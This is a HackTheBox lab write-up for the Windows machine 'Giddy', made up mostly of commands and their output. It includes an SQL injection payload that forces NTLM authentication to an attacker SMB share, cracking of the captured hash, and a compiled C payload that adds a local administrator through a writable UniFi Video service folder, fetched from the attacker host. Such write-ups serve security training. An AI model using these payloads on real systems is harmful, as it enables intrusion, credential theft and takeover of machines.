WriteupsHTB — Giddy
WebMediumWindows
HTB — Giddy
SQL injection via stored procedure triggers NTLM hash capture. Responder catches hash, crack for WinRM. Ubiquiti UniFi privesc via service abuse.
November 25, 2024HackTheBox
#SQLi#NTLM#Responder#WinRM
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 12:27 EST
Nmap scan report for 10.10.10.104
Host is up (0.023s latency).
Not shown: 65531 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2024-11-25T17:29:44+00:00; 0s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
| tls-alpn:
| h2
|_ http/1.1
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2024-11-24T17:17:30
|_Not valid after: 2025-05-26T17:17:30
|_ssl-date: 2024-11-25T17:29:44+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 24.38 ms 10.10.14.1
2 24.50 ms 10.10.10.104
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.04 seconds
80/tcp open http
sh
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACEferoxbuster
sh
feroxbuster --url http://10.10.10.104/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.104/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 157c http://10.10.10.104/aspnet_client => http://10.10.10.104/aspnet_client/
200 GET 362l 2183w 158770c http://10.10.10.104/giddy.jpg
200 GET 32l 55w 700c http://10.10.10.104/
302 GET 3l 8w 160c http://10.10.10.104/Remote/ => http://10.10.10.104/Remote/default.aspx?ReturnUrl=%2fRemote%2f
302 GET 3l 8w 141c http://10.10.10.104/Remote/default.aspx => http://10.10.10.104/Remote/en-US/logon.aspx
302 GET 3l 8w 157c http://10.10.10.104/remote => http://10.10.10.104/Remote/default.aspx?ReturnUrl=%2fremote
404 GET 40l 156w 1888c http://10.10.10.104/con
301 GET 2l 10w 157c http://10.10.10.104/Aspnet_client => http://10.10.10.104/Aspnet_client/
404 GET 40l 156w 1902c http://10.10.10.104/aspnet_client/con
301 GET 2l 10w 147c http://10.10.10.104/mvc => http://10.10.10.104/mvc/
301 GET 2l 10w 157c http://10.10.10.104/aspnet_Client => http://10.10.10.104/aspnet_Client/
404 GET 40l 156w 1888c http://10.10.10.104/aux
404 GET 40l 156w 1902c http://10.10.10.104/aspnet_client/aux
301 GET 2l 10w 155c http://10.10.10.104/mvc/scripts => http://10.10.10.104/mvc/scripts/
301 GET 2l 10w 154c http://10.10.10.104/mvc/images => http://10.10.10.104/mvc/images/
301 GET 2l 10w 155c http://10.10.10.104/mvc/content => http://10.10.10.104/mvc/content/
301 GET 2l 10w 155c http://10.10.10.104/mvc/Scripts => http://10.10.10.104/mvc/Scripts/
301 GET 2l 10w 155c http://10.10.10.104/mvc/account => http://10.10.10.104/mvc/account/
301 GET 2l 10w 154c http://10.10.10.104/mvc/Images => http://10.10.10.104/mvc/Images/
200 GET 4l 14w 888c http://10.10.10.104/mvc/Images/accent.png
200 GET 16l 102w 6719c http://10.10.10.104/mvc/Images/orderedList6.png
200 GET 16l 83w 6196c http://10.10.10.104/mvc/Images/orderedList8.png
200 GET 6l 16w 1176c http://10.10.10.104/mvc/Images/orderedList1.png
200 GET 7l 24w 1332c http://10.10.10.104/mvc/Images/orderedList2.png
200 GET 14l 74w 5095c http://10.10.10.104/mvc/Images/bullet.png
200 GET 15l 82w 6008c http://10.10.10.104/mvc/Images/orderedList4.png
301 GET 2l 10w 162c http://10.10.10.104/mvc/content/themes => http://10.10.10.104/mvc/content/themes/
200 GET 7l 27w 1335c http://10.10.10.104/mvc/Images/orderedList3.png
200 GET 17l 87w 6109c http://10.10.10.104/mvc/Images/orderedList0.png
200 GET 17l 82w 5981c http://10.10.10.104/mvc/Images/orderedList5.png
200 GET 4l 18w 972c http://10.10.10.104/mvc/Images/heroAccent.png
200 GET 18l 95w 6158c http://10.10.10.104/mvc/Images/orderedList9.png
200 GET 17l 95w 6493c http://10.10.10.104/mvc/Images/orderedList7.png
200 GET 1l 182w 7579c http://10.10.10.104/mvc/content/css
302 GET 3l 8w 157c http://10.10.10.104/Remote => http://10.10.10.104/Remote/default.aspx?ReturnUrl=%2fRemote
404 GET 40l 156w 1902c http://10.10.10.104/Aspnet_client/con
200 GET 1l 182w 7579c http://10.10.10.104/mvc/content/CSS
301 GET 2l 10w 162c http://10.10.10.104/mvc/content/Themes => http://10.10.10.104/mvc/content/Themes/
301 GET 2l 10w 155c http://10.10.10.104/mvc/Content => http://10.10.10.104/mvc/Content/
301 GET 2l 10w 151c http://10.10.10.104/mvc/obj => http://10.10.10.104/mvc/obj/
301 GET 2l 10w 155c http://10.10.10.104/mvc/Account => http://10.10.10.104/mvc/Account/
200 GET 1l 182w 7579c http://10.10.10.104/mvc/Content/css
301 GET 2l 10w 162c http://10.10.10.104/mvc/Content/themes => http://10.10.10.104/mvc/Content/themes/
301 GET 2l 10w 167c http://10.10.10.104/mvc/content/themes/base => http://10.10.10.104/mvc/content/themes/base/
200 GET 1l 182w 7579c http://10.10.10.104/mvc/Content/CSS
200 GET 1l 182w 7579c http://10.10.10.104/mvc/content/Css
301 GET 2l 10w 162c http://10.10.10.104/mvc/Content/Themes => http://10.10.10.104/mvc/Content/Themes/
301 GET 2l 10w 157c http://10.10.10.104/mvc/obj/debug => http://10.10.10.104/mvc/obj/debug/
301 GET 2l 10w 158c http://10.10.10.104/mvc/Properties => http://10.10.10.104/mvc/Properties/
301 GET 2l 10w 158c http://10.10.10.104/mvc/properties => http://10.10.10.104/mvc/properties/
301 GET 2l 10w 167c http://10.10.10.104/mvc/content/Themes/base => http://10.10.10.104/mvc/content/Themes/base/
301 GET 2l 10w 167c http://10.10.10.104/mvc/Content/themes/base => http://10.10.10.104/mvc/Content/themes/base/
301 GET 2l 10w 154c http://10.10.10.104/mvc/IMAGES => http://10.10.10.104/mvc/IMAGES/
200 GET 1l 182w 7579c http://10.10.10.104/mvc/Content/Css
301 GET 2l 10w 162c http://10.10.10.104/mvc/content/THEMES => http://10.10.10.104/mvc/content/THEMES/
301 GET 2l 10w 167c http://10.10.10.104/mvc/Content/Themes/base => http://10.10.10.104/mvc/Content/Themes/base/
301 GET 2l 10w 162c http://10.10.10.104/mvc/Content/THEMES => http://10.10.10.104/mvc/Content/THEMES/
301 GET 2l 10w 168c http://10.10.10.104/aspnet_client/system_web => http://10.10.10.104/aspnet_client/system_web/
301 GET 2l 10w 167c http://10.10.10.104/mvc/content/THEMES/base => http://10.10.10.104/mvc/content/THEMES/base/
[##>-----------------] - 87s 87796/750138 10m found:59 errors:1
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_10_10_10_104_-1732556114.state ...
[##>-----------------] - 87s 87896/750138 10m found:59 errors:1
[##########>---------] - 87s 15890/30000 183/s http://10.10.10.104/
[##########>---------] - 86s 15537/30000 180/s http://10.10.10.104/aspnet_client/
[######>-------------] - 74s 9049/30000 123/s http://10.10.10.104/Aspnet_client/
[##>-----------------] - 64s 3038/30000 48/s http://10.10.10.104/mvc/
[##>-----------------] - 62s 4277/30000 69/s http://10.10.10.104/aspnet_Client/
[#>------------------] - 56s 2894/30000 52/s http://10.10.10.104/mvc/images/
[#>------------------] - 56s 2859/30000 51/s http://10.10.10.104/mvc/scripts/
[#>------------------] - 55s 2830/30000 51/s http://10.10.10.104/mvc/content/
[#>------------------] - 55s 2819/30000 51/s http://10.10.10.104/mvc/Scripts/
[#>------------------] - 55s 2756/30000 50/s http://10.10.10.104/mvc/account/
[#>------------------] - 55s 2698/30000 49/s http://10.10.10.104/mvc/Images/
[#>------------------] - 54s 2646/30000 49/s http://10.10.10.104/mvc/content/themes/
[#>------------------] - 50s 2277/30000 46/s http://10.10.10.104/mvc/content/Themes/
[#>------------------] - 49s 2245/30000 46/s http://10.10.10.104/mvc/Content/
[#>------------------] - 49s 2215/30000 45/s http://10.10.10.104/mvc/obj/
[#>------------------] - 48s 2135/30000 44/s http://10.10.10.104/mvc/Account/
[#>------------------] - 48s 2100/30000 44/s http://10.10.10.104/mvc/Content/themes/
[#>------------------] - 40s 1684/30000 42/s http://10.10.10.104/mvc/Content/Themes/
[#>------------------] - 40s 1652/30000 42/s http://10.10.10.104/mvc/obj/debug/
[#>------------------] - 38s 1576/30000 41/s http://10.10.10.104/mvc/Properties/
[>-------------------] - 37s 1494/30000 41/s http://10.10.10.104/mvc/properties/
[>-------------------] - 31s 1203/30000 39/s http://10.10.10.104/mvc/IMAGES/
[>-------------------] - 28s 1050/30000 38/s http://10.10.10.104/mvc/content/THEMES/
[>-------------------] - 16s 451/30000 29/s http://10.10.10.104/mvc/Content/THEMES/
[>-------------------] - 8s 232/30000 29/s http://10.10.10.104/aspnet_client/system_web/
[--------------------] - 0s 0/30000 - http://10.10.10.104/giddy.jpg /mvc/search
- sql injectoin
web
test' EXEC master..xp_dirtree '\\10.10.14.4\share\'--- capturing hashes
sh
sudo impacket-smbserver share -smb2support ./
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.104,49722)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:aaaaaaaaaaaaaaaa:7f1f1342...:01010000000000000033c3fe843fdb014a4eee369e48150f00000000010010006c0043006300460056004b0041005200030010006c0043006300460056004b00410052000200100058004f00440076006200560063006e000400100058004f00440076006200560063006e00070008000033c3fe843fdb0106000400020000000800300030000000000000000000000000300000f0d9f35c5ef0c031ab224de3728c1a62676b15421cfca7d3a036103a7e6d97260a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:aaaaaaaaaaaaaaaa:f7d6ed28...:010100000000000080c95bff843fdb0191a79d16709ee48100000000010010006c0043006300460056004b0041005200030010006c0043006300460056004b00410052000200100058004f00440076006200560063006e000400100058004f00440076006200560063006e000700080080c95bff843fdb0106000400020000000800300030000000000000000000000000300000f0d9f35c5ef0c031ab224de3728c1a62676b15421cfca7d3a036103a7e6d97260a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000hashcat
sh
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
STACY::GIDDY:aaaaaaaaaaaaaaaa:f7d6ed28...:010100000000000080c95bff843fdb0191a79d16709ee48100000000010010006c0043006300460056004b0041005200030010006c0043006300460056004b00410052000200100058004f00440076006200560063006e000400100058004f00440076006200560063006e000700080080c95bff843fdb0106000400020000000800300030000000000000000000000000300000f0d9f35c5ef0c031ab224de3728c1a62676b15421cfca7d3a036103a7e6d97260a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000:xNnWo6272k7xcreds
Stacy:xNnWo6272k7x
sh
nxc rdp 10.10.10.104 -u 'stacy' -p 'xNnWo6272k7x'
RDP 10.10.10.104 3389 GIDDY [*] Windows 10 or Windows Server 2016 Build 14393 (name:GIDDY) (domain:Giddy) (nla:True)
RDP 10.10.10.104 3389 GIDDY [+] Giddy\stacy:xNnWo6272k7x
nxc winrm 10.10.10.104 -u 'stacy' -p 'xNnWo6272k7x'
WINRM 10.10.10.104 5985 GIDDY [*] Windows 10 / Server 2016 Build 14393 (name:GIDDY) (domain:Giddy)
WINRM 10.10.10.104 5985 GIDDY [+] Giddy\stacy:xNnWo6272k7x (Pwn3d!)evil-winrm
sh
evil-winrm -i 10.10.10.104 -u stacy -p 'xNnWo6272k7x'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Stacy\Documents> whoami
giddy\stacyuser.txt
sh
*Evil-WinRM* PS C:\Users\Stacy\Desktop> cat user.txt
f1624dea...privilege escalation
unified video
- https://www.exploit-db.com/exploits/43390
sh
*Evil-WinRM* PS C:\ProgramData\unifi-video> icacls .\
.\ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\ProgramData\unifi-video> echo 'test'>test.txt
powershell
*Evil-WinRM* PS C:\ProgramData\unifi-video> Get-Service "Ubiquiti UniFi Video"
Status Name DisplayName
------ ---- -----------
Running UniFiVideoService Ubiquiti UniFi Videosh
*Evil-WinRM* PS C:\ProgramData\unifi-video> Stop-Service "Ubiquiti UniFi Video"
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...sh
*Evil-WinRM* PS C:\ProgramData\unifi-video> Get-Service "Ubiquiti UniFi Video"
Status Name DisplayName
------ ---- -----------
Stopped UniFiVideoService Ubiquiti UniFi Video
taskkill.c
c
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user test Password123 /add");
i = system ("net localgroup administrators test /add");
return 0;
}sh
x86_64-w64-mingw32-gcc taskkill.c -o taskkill.exesh
*Evil-WinRM* PS C:\ProgramData\unifi-video> Invoke-WebRequest http://10.10.14.4/taskkill.exe -OutFile taskkill.exesh
*Evil-WinRM* PS C:\ProgramData\unifi-video> Start-Service "Ubiquiti UniFi Video"powershell
*Evil-WinRM* PS C:\ProgramData\unifi-video> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
test
The command completed successfully.sh
evil-winrm -i 10.10.10.104 -u test -p 'Password123'root.txt
sh
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
b2e76f8c...Up next
EasyNov 2024
HTB — Pilgrimage
ImageMagick CVE-2022-44268 arbitrary file read via malicious PNG. SQLite database exposes credentials. Binwalk CVE-2022-4510 for root shell.
Read writeup
EasyNov 2024
HTB — Tabby
LFI on Tomcat manager exposes credentials. WAR file deployed for RCE. ZIP password cracking, LXD container privilege escalation for root.
Read writeup
EasyNov 2024
HTB — CozyHosting
Spring Boot Actuator exposes session cookies. Hijacked admin session to exploit command injection in SSH endpoint for reverse shell.
Read writeup